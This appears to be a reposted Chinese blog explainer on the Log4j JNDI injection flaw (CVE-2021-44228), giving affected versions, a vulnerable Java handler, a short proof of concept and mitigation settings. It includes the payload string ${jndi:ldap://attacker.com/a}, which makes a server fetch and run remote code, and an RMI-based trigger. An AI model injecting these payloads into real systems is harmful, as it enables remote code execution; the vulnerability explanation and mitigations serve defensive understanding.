Apache Log4j 漏洞（JNDI注入 CVE-2021-44228）

漏洞

影响范围

2.0 <= Apache log4j <= 2.14.1

利用

import org.apache.log4j.Logger;import java.io.*;import java.sql.SQLException;import java.util.*;public class VulnerableLog4jExampleHandler implements HttpHandler { static Logger log = Logger.getLogger(log4jExample.class.getName()); /** * A simple HTTP endpoint that reads the request's User Agent and logs it back. * This is basically pseudo-code to explain the vulnerability, and not a full example. * @param he HTTP Request Object */ public void handle(HttpExchange he) throws IOException { string userAgent = he.getRequestHeader("user-agent"); // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header. // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a} log.info("Request User Agent:" + userAgent); String response = "

Hello There, " + userAgent + "!

"; he.sendResponseHeaders(200, response.length()); OutputStream os = he.getResponseBody(); os.write(response.getBytes()); os.close(); }}

Data from the User gets sent to the server (via any protocol), The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server), The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via “Java Naming and Directory Interface” (JNDI), This response contains a path to a remote Java class file (ex. which is injected into the server process, This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

另一种方法：

import org.apache.logging.log4j.Logger;import org.apache.logging.log4j.LogManager;public class Poc { private static final Logger log = LogManager.getLogger(); public static void main(String[] args) { log.error("${jndi:rmi://127.0.0.1:1099/xxxx}"); }}

缓解方式

a、修改jvm参数 -Dlog4j2.formatMsgNoLookups=trueb、修改配置：log4j2.formatMsgNoLookups=Truec、系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

参考

​​https://v2ex.com/t/821241

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。